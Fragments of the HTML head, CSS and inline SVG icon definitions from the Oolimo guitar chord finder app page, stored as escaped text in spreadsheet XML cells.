&lt;meta name="description" content="The Oolimo Guitar Chord Finder and Chord Analyzer as an app!"/&gt;_x005F_x000D_
&lt;meta name="author" content="Oliver Mochmann" /&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;script src="../../ooapps/ooslider.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;meta name="verify-v1" content="ge+g7G6Av/YqjiApFyWxhMhz7Ygpo3S+ZoVSWHXTYi8=" /&gt;_x005F_x000D_
 &lt;script async src="https://cdn.fuseplatform.net/publift/tags/2/3069/fuse.js"&gt;&lt;/script&gt;
&lt;link rel="alternate" hreflang="de" href="https://www.oolimo.com/de/infos/app" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1"&gt;_x005F_x000D_
&lt;link rel="shortcut icon" href="https://oolimo.com/oofavicon.ico" /&gt;_x005F_x000D_
&lt;link href="../../css/ooColors.css?v=011" rel="stylesheet" media="all" /&gt;
&lt;link href="../../css/ooLayout.css?v=011" rel="stylesheet" media="all" /&gt;
&lt;script src="../../js/howler.min.js?v=011"&gt;&lt;/script&gt;
&lt;script src="https://code.createjs.com/1.0.0/createjs.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script src="../../ooapps/ooui.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/ooapps.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/fretboardcanvas.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/staff.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/staffboards.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/chorddiagrams.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/chordchart.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/ooapps_resize.js?v=011"&gt;&lt;/script&gt;
&lt;script src="../../ooapps/ootoc.js?v=011"&gt;&lt;/script&gt;
&lt;script type="text/javascript" id="publift-sticky"&gt;_x005F_x000D_
	// #### preferences by publift ####_x005F_x000D_
	window. EnableStickyFooter = false;_x005F_x000D_
	// #### my preferences #####_x005F_x000D_
	window.</t>
  </si>
  <si>
    <t>UpperAdBar = false;_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;script&gt;
var oolanguage = 'EN';
var language = 'en';
&lt;/script&gt;
_x005F_x000D_
&lt;style&gt;_x005F_x000D_
.blue .svgnight, .day .svgnight</t>
  </si>
  <si>
    <t>{display:none}_x005F_x000D_
_x005F_x000D_
h2  {font-family:'Varela Round',sans-serif; font-weight:100} _x005F_x000D_
.colorsetbtn {display:inline-block; position:relative; width:120px; height:90px; margin:0 10px; background:none; border:none }_x005F_x000D_
.colorsetbtn svg {display:block; position:absolute; width:60%; height:65%; left:20%; top:5px; fill:#554; stroke:#554}_x005F_x000D_
.btntxt { display:block; position:absolute; width:100%; bottom:3px; text-align:center; font-size:0.8em}_x005F_x000D_
#privacy {padding:10px 20px;border-radius:7px; background:#08A; color:#FFF; font-size:0.9em; margin:40px 0</t>
  </si>
  <si>
    <t>30px 0} /* background:#770; */_x005F_x000D_
#privacy h2 {color:#AEF; } /*color:#FF9*/_x005F_x000D_
.storelinks p {text-align:center}_x005F_x000D_
.storelinks img { width:100%;}_x005F_x000D_
.storelinks a { display:inline-block; width:24%; margin:0 2%;}_x005F_x000D_
#nav2app {display:none;}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
/* ### CONTENT-SLIDER ##### */_x005F_x000D_
#slider1 {height:420px; }_x005F_x000D_
@media screen and (max-width:619px) {_x005F_x000D_
	#slider1 {height:800px; }_x005F_x000D_
}_x005F_x000D_
#slider1 svg {border-radius:9px}_x005F_x000D_
_x005F_x000D_
.mini { background:#B32;background:#D72; }_x005F_x000D_
.slidebtn { background:#F70; }_x005F_x000D_
.slidebtn:hover { background:#F80; }_x005F_x000D_
#svgnext, #svgprev {fill:#789; stroke:#443}_x005F_x000D_
_x005F_x000D_
/* ######### SLIDER ######### */_x005F_x000D_
/* .imageslider {background:#EEE; border:1px solid #DDD;} */_x005F_x000D_
.slide, .slidebox, .minibox {position:absolute;}_x005F_x000D_
_x005F_x000D_
.imageslider</t>
  </si>
  <si>
    <t>{position:relative; width:98%; left:1%; height:440px; top:0; overflow:hidden; margin:10px 1% }_x005F_x000D_
.imageslider .slide { top:0; left:0; width:100%; } /* height:100%; ; background:#BA6   #BA6 = gold */   _x005F_x000D_
.imageslider .slidebox {top:0; left:0; width:100%; text-align:center; overflow:hidden} /* height:80%; */_x005F_x000D_
.imageslider .minibox { bottom:0; left:2%; height:18%; width:70%; z-index:30; }_x005F_x000D_
.imageslider .mini {position:relative; display:inline-block; width:40px; height:40px; margin:5% 1.5%; border-radius:3px; transition: transform .3s, background 2s; }_x005F_x000D_
.imageslider .mini &gt; img {margin:0; top:0; border-radius:0}_x005F_x000D_
.imageslider .activeMini {transform:scale(1.15, 1.15)}_x005F_x000D_
_x005F_x000D_
.contentslider {position:relative; width:100%; left:0; height:400px; top:0; overflow:hidden; }_x005F_x000D_
.contentslider .slidebox { top:0; left:0; width:100%;} /* height:85%;  */_x005F_x000D_
.contentslider .slide { height:100%; width:100%; }_x005F_x000D_
.contentslider .slide &gt; div {position:relative; }_x005F_x000D_
.contentslider .minibox { bottom:10px; left:0; height:40px; width:100%; text-align:center;}_x005F_x000D_
.contentslider .mini {position:relative; display:inline-block;  margin:11px 10px; width:18px; height:18px; border-radius:13px;}_x005F_x000D_
.contentslider .activeMini {transform:scale(1.2, 1.2)}_x005F_x000D_
_x005F_x000D_
.slidebtn {position:absolute; width:40px; height:40px; bottom:10px; border-radius:7px; border:0; opacity:0.64; z-index:100}_x005F_x000D_
.slideprev {left:1%}_x005F_x000D_
.slidenext {right:1%}_x005F_x000D_
.slidebtn</t>
  </si>
  <si>
    <t>svg {position:absolute; width:80%; height:80%; left:10%; top:10% }_x005F_x000D_
.slidebtn:hover {opacity:0.9;}_x005F_x000D_
_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
&lt;div id="svgbox"&gt;_x005F_x000D_
&lt;svg id="svgoolimo"&gt;&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgqyn" viewbox="0 0 200 200" height="20" width="20"&gt;_x005F_x000D_
&lt;g id="svgq" fill="#DDC" stroke="#DDC"&gt;_x005F_x000D_
&lt;path d="M 50,60 C 50,5 150,5 150,60 C 150,100 100,90 100,130 L 100,135" stroke-linecap="round" stroke-width="22" fill="none" /&gt;_x005F_x000D_
&lt;circle cx="100" cy="180" r="15" stroke="none" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;path id="svgy" d="M 30,110 L 90,160 180,30" stroke-width="25" stroke-linejoin="round" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;path id="svgn" d="M 40,40 L 160,160 M 40,160 L 160,40" stroke-width="25" stroke-linejoin="round" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgdescrpos" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;symbol&gt;_x005F_x000D_
&lt;rect id="cdr" x="0" y="0" width="80" height="80" stroke-linecap="round" stroke-width="14" fill="none" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;use href="#cdr" transform="translate(180,30)" /&gt;_x005F_x000D_
&lt;use href="#cdr" transform="translate(300,30)" /&gt;_x005F_x000D_
&lt;use href="#cdr" transform="translate(180,150)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#cdr" transform="translate(300,150)" /&gt;_x005F_x000D_
&lt;symbol&gt;_x005F_x000D_
&lt;line id="tl" x1="0" y1="0" x2="100" y2="0" stroke-linecap="square" stroke-width="30" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;symbol&gt;_x005F_x000D_
&lt;line id="tu" x1="0" y1="0" x2="200" y2="0" stroke-linecap="square" stroke-dasharray="15 30" stroke-width="18" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;use href="#tl" transform="translate(20,40)" /&gt;_x005F_x000D_
&lt;use href="#tl" transform="translate(20,90)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#tl" transform="translate(20,140)" /&gt;_x005F_x000D_
&lt;use href="#tl" transform="translate(20,190)" /&gt;_x005F_x000D_
&lt;use href="#tu" transform="translate(180,290)" /&gt;_x005F_x000D_
&lt;use href="#tu" transform="translate(180,335)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#tu" transform="translate(180,380)" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgcheckbox" viewBox="0 0 100 100"&gt;_x005F_x000D_
&lt;circle id="svgcbbox" cx="50" cy="50" r="42" stroke-width="10" /&gt;_x005F_x000D_
&lt;circle id="svgcbcheck" cx="50" cy="50" r="22" stroke="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
 &lt;svg id="svgsoundonoff" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;g  stroke-linecap="round" fill="none" stroke-linejoin="round"&gt;_x005F_x000D_
&lt;path d="M 20,75 L 20,65 M 60,100 L 60,40 M 100,130 L 100,10 M 140,100 L 140,40 M 180,80 L 180,60 M 220,80 L 220,60 M 260,100 L 260,40 M 300,130 L 300,10 M 340,100 L 340,40 M 380,75 L 380,65 " stroke-width="20" /&gt;_x005F_x000D_
&lt;g id="soundone"&gt;_x005F_x000D_
&lt;path id="svgtray" d="M 0,0 L 0,40 C 0,55</t>
  </si>
  <si>
    <t>20,60 25,60 L 40,60 240,60 C 255,60 260,55 260,40 L 260,0" transform="translate(70,320)" stroke-width="34" /&gt;_x005F_x000D_
&lt;path id="svgsoundarrow" class="svgsoundarrow" d="M 50,00 L 50,140 M 0,100 L 50,150 100,100" transform="translate(150,160)" stroke-width="34" /&gt;_x005F_x000D_
&lt;path id="svgsoundline" d="M 20,200 L 150,200 M 250,200 L380,200" stroke-dasharray="12,45" stroke-width="38" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g id="sound3trays"&gt;_x005F_x000D_
&lt;path id="svgtray3" d="M 0,0 L 0,30 C 0,45 10,50 25,50 L 75,50 C 90,50 100,45 100,30 L 100,0" stroke-width="28" transform="translate(10,340)" /&gt;_x005F_x000D_
&lt;use href="#svgtray3" transform="translate(145,0)" /&gt;_x005F_x000D_
&lt;use href="#svgtray3" transform="translate(290,0)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g id="sound3arrows"&gt;_x005F_x000D_
	&lt;use href="#svgsoundarrow" transform="translate(-100,50),scale(0.8)" /&gt;_x005F_x000D_
	&lt;use href="#svgsoundarrow" transform="translate(50,50),scale(0.8)" /&gt;_x005F_x000D_
	&lt;use href="#svgsoundarrow" transform="translate(190,50),scale(0.8)"</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgnext" viewBox="0 0 100 200"&gt;_x005F_x000D_
&lt;g stroke-width="25" stroke-linecap="round"&gt;_x005F_x000D_
&lt;path d="M 20,40 L 85,100 L 20,160" fill="none" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgprev" viewBox="0 0 100 200"&gt;_x005F_x000D_
&lt;g stroke-width="25" stroke-linecap="round"&gt;_x005F_x000D_
&lt;path d="M 80,40 L 15,100 L 80,160" fill="none" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgleft" viewBox="-20 -20 120 220" height="20" width="20"&gt;_x005F_x000D_
&lt;path d="M 85,25 L 10,100 L 85,175" stroke-width="25" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgright" viewBox="-20 -20 120 220" height="20" width="20"&gt;_x005F_x000D_
&lt;path d="M 15,25 L 90,100 L 15,175" stroke-width="25" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgup" viewBox="-30 -30 260 150" height="20" width="20"&gt;_x005F_x000D_
&lt;path d="M 25,85 L 100,10 L 175,85" stroke-width="25" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgdown" viewBox="-30 -30 260 150" height="20" width="20"&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;path d="M 25,15 L 100,90 L 175,15" stroke-width="25" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgplay" viewBox="0 -10  120 220"&gt;_x005F_x000D_
&lt;path  stroke-width="22" stroke-linecap="round" d="M 25,35 L 90,90 C 96,97 96,103 90,110 L 25,165 C 10,175 10,165 10,160 V 40 C 10,35 10,25 25,35 V 35" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgspotinfo2" viewBox="0 -10 200 210" height="20" width="20"&gt;_x005F_x000D_
&lt;circle cx="100" cy="100" r="88" stroke-width="15" fill="none" /&gt;_x005F_x000D_
&lt;g stroke-width="30"&gt;_x005F_x000D_
&lt;line x1="100" y1="95" x2="100" y2="160"  /&gt;_x005F_x000D_
&lt;circle cx="100" cy="60" r="17" stroke="none" /&gt;_x005F_x000D_
 &lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgspotinfo" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g stroke-width="13" stroke-linecap="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M0,100 H 20 M180,100 H200" id="stump" class="stump" /&gt;_x005F_x000D_
&lt;circle cx="100" cy="100" r="72" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;circle cx="99" cy="68" r="10" stroke-width="9" fill="none"   /&gt;_x005F_x000D_
&lt;path d="M102,102 V140" stroke-width="18" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;path d="M91,99 L103,99 M91,142 H113" stroke-width="16" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;svg id="svgzoomin" viewBox="0 0 200 200"&gt;_x005F_x000D_
	&lt;circle cx="90" cy="85" r="70" stroke-width="15" fill="none" /&gt;_x005F_x000D_
	&lt;line x1="150" y1="145" x2="185" y2="180" stroke-linecap="round" stroke-width="25" fill="none" /&gt;_x005F_x000D_
	&lt;line x1="60" y1="85" x2="120" y2="85" stroke-linecap="round"  stroke-width="20" fill="none" /&gt;_x005F_x000D_
	&lt;line x1="90" y1="55" x2="90" y2="115" stroke-linecap="round"  stroke-width="20" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgzoomout" viewBox="0 0 200 200"&gt;_x005F_x000D_
	&lt;circle cx="90" cy="85" r="70" stroke-width="15" fill="none" /&gt;_x005F_x000D_
	&lt;line x1="150" y1="145" x2="185" y2="180" stroke-linecap="round" stroke-width="25" fill="none" /&gt;_x005F_x000D_
	&lt;line x1="60" y1="85" x2="120" y2="85" stroke-linecap="round"  stroke-width="22" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgvertical" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g stroke-linecap="round" stroke-width="16" fill="none" &gt;_x005F_x000D_
&lt;path d="M 65,165 L 115,165 C 140,165 165,140 165,115 L 165,65" /&gt;_x005F_x000D_
 &lt;path d="M 90,190 L 65,165 L 90,140" stroke-linejoin="round" /&gt;_x005F_x000D_
&lt;path d="M 190,90 L 165,65 L 140,90" stroke-linejoin="round" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g stroke-linecap="round" stroke-width="8"  fill="none" &gt;_x005F_x000D_
&lt;rect x="60" y="10" width="80" height="40" /&gt;_x005F_x000D_
&lt;rect x="10" y="60" width="40" height="80" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
_x005F_x000D_
&lt;svg id="svglefthand" class="svglefthand" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;g id="svghandsaiten" stroke-width="20" stroke-dasharray="20 16" stroke-linecap="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M 0 20 L 127,20 M 295,20 400,20" /&gt;_x005F_x000D_
 &lt;path d="M 0 80 L 100,80 M 295,80 400,80" /&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;path d="M 0 140 L 5,140 M 295,140 400,140"  /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;path id="svghand" class= "svghand" d="M 20,300 L _x005F_x000D_
20,180 C 20,160 _x005F_x000D_
30,140 50,140 C 70,140 _x005F_x000D_
80,160 80,180 L 80,230 80,140 C 80,120 _x005F_x000D_
90,100 110,100 C 130,100 _x005F_x000D_
140,120 140,140 L 140,200 140,60 C 140,40 _x005F_x000D_
150,20 170,20 C 190,20 _x005F_x000D_
200,40 200,60 L 200,200 200,50 C 200,30 _x005F_x000D_
210,10 230,10 C 250,10 _x005F_x000D_
260,30 260,50 L 260,200 C 260,230 _x005F_x000D_
280,190 340,190 C 360,190 _x005F_x000D_
385,205 385,225 C 385,255 _x005F_x000D_
380,260 350,265 C 290,270_x005F_x000D_
260,340 255,350 C 250,370_x005F_x000D_
250,370 250,380 M 50,380 C 40,360 20,340 20,300" _x005F_x000D_
stroke-width="20" stroke-linejoin="round" stroke-linecap="round" fill="none"/&gt;_x005F_x000D_
&lt;path id="svghandL" class="svghandL" d="M140,230 L 140,335 210,335" transform="translate(-20,40)" stroke-width="32" stroke-linejoin="round" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;path id="svghandR" class="svghandR" d="M200,345 L 200,220 170,220 C 110,220 110,285 170,285 L 170,285 110,345" transform="translate(-5,40)" stroke-linejoin="round" stroke-width="24"   stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
_ x000D_
&lt;svg id="svgcf" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;mask id="cfMask"&gt;_x005F_x000D_
&lt;circle id="cfMaskCircle" cx="200" cy="170" r="140" stroke="none" fill="#FFF" /&gt;_x005F_x000D_
&lt;/mask&gt;_x005F_x000D_
&lt;symbol id="svgcfsaite"&gt;&lt;line x1="0" y1="0" x2="380" y2="0"  /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="svgcfbund"&gt;&lt;line x1="0" y1="0" x2="0" y2="300" /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;g stroke-width="40" stroke="#887" fill="none" mask="url(#cfMask)" style="mask:url(#cfMask)"&gt;_x005F_x000D_
&lt;use href="#svgcfsaite" transform="translate(10,120)" /&gt;_x005F_x000D_
&lt;use href="#svgcfsaite" transform="translate(10,245)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#svgcfbund" transform="translate(180,40)" /&gt;_x005F_x000D_
&lt;rect class="fbsquare" x="230" y="190" width="150" height="150" rx="30" ry="30" stroke-width="30" /&gt;_x005F_x000D_
&lt;circle class="fbdot" cx="80" cy="120" r="70" stroke-width="30" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g id="svgcflupe" fill="none"&gt;_x005F_x000D_
&lt;path d="M 330 310 L 380 360" stroke-width="60" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;circle r="144" cx="200" cy="170" stroke-width="30" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgcc" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;mask id="ccMask"&gt;_x005F_x000D_
&lt;rect x="0" y="0" width="400" height="400" stroke="none" fill="#000" /&gt;_x005F_x000D_
&lt;circle cx="180" cy="170" r="140" stroke="none" fill="#FFF"/&gt;_x005F_x000D_
&lt;/mask&gt;_x005F_x000D_
&lt;mask id="ccMaskInv"&gt;_x005F_x000D_
&lt;rect x="0" y="0" width="400" height="400" stroke="none" fill="#FFF" /&gt;_x005F_x000D_
&lt;circle cx="180" cy="170" r="215" transform="translate(90,85),scale(0.6)" stroke-width="0" stroke="#000" fill="#000"/&gt;_x005F_x000D_
&lt;path d="M 320 320 L 370 370" transform="translate(90,85),scale(0.6)" stroke-width="120" stroke="#000" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;/mask&gt;_x005F_x000D_
&lt;symbol id="cclupe"&gt;_x005F_x000D_
&lt;g fill="none"&gt;_x005F_x000D_
&lt;path d="M 320 320 L 370 370" stroke-width="60" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;circle  cx="180" cy="170" r="144" stroke-width="50" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="ccch"&gt;_x005F_x000D_
&lt;rect x="10" y="10" width="150" height="90" rx="11" ry="11" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;g id="ccchs" mask="url(#ccMaskInv)" stroke-width="20" &gt;_x005F_x000D_
&lt;use href="#ccch" transform="translate(5,5)" /&gt;_x005F_x000D_
&lt;use href="#ccch" transform="translate(220,5)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#ccch" transform="translate(5,145)" /&gt;_x005F_x000D_
&lt;use href="#ccch" transform="translate(220,145)" /&gt;_x005F_x000D_
&lt;use href="#ccch" transform="translate(5,285)" /&gt;_x005F_x000D_
&lt;use href="#ccch" transform="translate(220,285)" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g mask="url(#ccMask)" transform="translate(90,85),scale(0.6)"</t>
  </si>
  <si>
    <t>&gt;_x005F_x000D_
&lt;rect id="ccsquare" class="fbsquare" x="220" y="180" width="180" height="180" rx="30" ry="30" stroke-width="40" /&gt;_x005F_x000D_
&lt;circle  id="ccdot" class="fbdot" cx="90" cy="100" r="80" stroke-width="40" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;use href="#cclupe" transform="translate(90,85),scale(0.6)" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgtochart" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;symbol id="ccch2"&gt;_x005F_x000D_
&lt;rect x="10" y="10" width="150" height="90" rx="10" ry="10" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
 &lt;g id="ccchs2" stroke-width="20" &gt;_x005F_x000D_
&lt;use href="#ccch2" transform="translate(10,10)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#ccch2" transform="translate(220,10)" /&gt;_x005F_x000D_
&lt;use href="#ccch2" transform="translate(10,145)" /&gt;_x005F_x000D_
&lt;use href="#ccch2" transform="translate(220,145)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#ccch2" transform="translate(10,280)" /&gt;_x005F_x000D_
&lt;use href="#ccch2" transform="translate(220,280)" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgca" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;symbol id="erl"&gt;_x005F_x000D_
&lt;path d="M 115,40 L 115,20 160,20 160,100 40,280 C 0,360 70,380 100,380 L 300,380 C 330,380 400,360 360,280 L 240,100 240,20 285,20 285,40" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="cas"&gt;&lt;rect x="15" y="15" width="110" height="110" rx="30" ry="30" stroke-width="26" /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="cad"&gt;&lt;circle cx="65" cy="65" r="50" stroke-width="26" /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;mask id="caMask"&gt;_x005F_x000D_
	&lt;rect x="0" y="0" width="400" height="400" stroke="none" fill="#000" /&gt;_x005F_x000D_
	&lt;use href="#erl" stroke-width="30" stroke-linecap="round" stroke="#000" fill="#FFF" /&gt;_x005F_x000D_
&lt;/mask&gt;_x005F_x000D_
 &lt;g mask="url(#caMask)"&gt;_x005F_x000D_
&lt;use class="fbsquare" href="#cas" transform="translate(40,240),rotate(20)" /&gt;_x005F_x000D_
&lt;use class="fbdot" href="#cad" transform="translate(200,270)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use class="fbdot" href="#cad" transform="translate(150,170),scale(0.7)" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;use href="#erl" stroke-width="30" stroke-linecap="round" fill="none" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
_ x000D_
&lt;svg id="svgtheory" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;g transform="translate(200,0)"&gt;_x005F_x000D_
&lt;path d="M 0,280 L-50,280 C -50,220 -100,200 -100,130</t>
  </si>
  <si>
    <t xml:space="preserve">C -100,75 -50,40 0,40 C 50,40 100,75 100,130 C 100,200 50,220 50,280 L 0,280" _ x000D_
stroke-linejoin="round" stroke-width="30" fill="none" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;g stroke-width="30" stroke-linecap="round" fill="none"&gt;_x005F_x000D_
&lt;line x1="-140" y1="45" x2="-165" y2="30" /&gt;_x005F_x000D_
&lt;line x1="-155" y1="125" x2="-180" y2="125" /&gt;_x005F_x000D_
&lt;line x1="-145" y1="205" x2="-170" y2="220" /&gt;_x005F_x000D_
&lt;line x1="140" y1="45" x2="165" y2="30" /&gt;_x005F_x000D_
&lt;line x1="155" y1="125" x2="180" y2="125" /&gt;_x005F_x000D_
&lt;line x1="145" y1="205" x2="170" y2="220" /&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;line x1="-40" y1="330" x2="40" y2="330" /&gt;_x005F_x000D_
&lt;line x1="-35" y1="380" x2="35" y2="380" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
_x005F_x000D_
&lt;svg id="svgchordtypes" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;g stroke-linecap="round"  stroke-linejoin="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M 20,110 L 170,290 M 20,290 L 170,110" stroke-width="30"  /&gt; _x005F_x000D_
&lt;path d="M 215,220 L 275,300 M 335,220 L 235,380" stroke-width="30"  /&gt;_x005F_x000D_
&lt;path d="M 300,50 L 380,50 300,155 390,155" stroke-width="25"  /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgpractice" viewBox="0 0 400 400" &gt;_x005F_x000D_
&lt;g stroke-linejoin="round" stroke-width="20" fill="none"&gt;_x005F_x000D_
&lt;circle cx="200" cy="60" r="35" /&gt;_x005F_x000D_
&lt;path d="M 150,260 L 150,170 C 110,185 110,200 110,230 C 110,250 70,250 70,230 C 70,190 80,145 160,120 L 200,125_x005F_x000D_
C230,125 240,180 300,180 C 320,180 320,220 300,220 C 270,220 240,220 200,170 L 200,240_x005F_x000D_
C 240,270 280,300 310,360 C 320,380 270,380 260,360 C 250,350 250,330 185,285_x005F_x000D_
C 170,330 150,350 140,360 C 122,382 80,380 90,360 C 115,330 140,300 150,250"  /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgquiz" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;g transform="rotate(-20),translate(-50,-30)"&gt;_x005F_x000D_
&lt;ellipse cx="100" cy="260" rx="120" ry="180" fill="none" stroke-width="30" /&gt;_x005F_x000D_
&lt;ellipse cx="100" cy="260" rx="50" ry="100" fill="none" stroke-width="25" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g transform="rotate(-25),translate(-55,35)"&gt;_x005F_x000D_
&lt;path d="M 80,200 L130 200" stroke-width="20" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;path d="M 120,200 L 340,200" fill="none" stroke-width="40" /&gt;_x005F_x000D_
 &lt;path d="M 260,200 L 300,140 390,140 350,200 390,260 300,260 260,200" stroke="none" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgsun" viewBox="0 0 600 600" height="20" width="20"&gt;_x005F_x000D_
&lt;mask id="sunmask"&gt;_x005F_x000D_
&lt;rect x="0" y="0" width="300" height="600" fill="#FFF" /&gt;_x005F_x000D_
&lt;/mask&gt;_x005F_x000D_
&lt;circle id="sundisk" cx="300" cy="300" r="150" mask="url(#sunmask)" /&gt;_x005F_x000D_
&lt;circle id="suncircle" cx="300" cy="300" r="150" stroke-width="40" fill="none" /&gt;_x005F_x000D_
&lt;symbol&gt;_x005F_x000D_
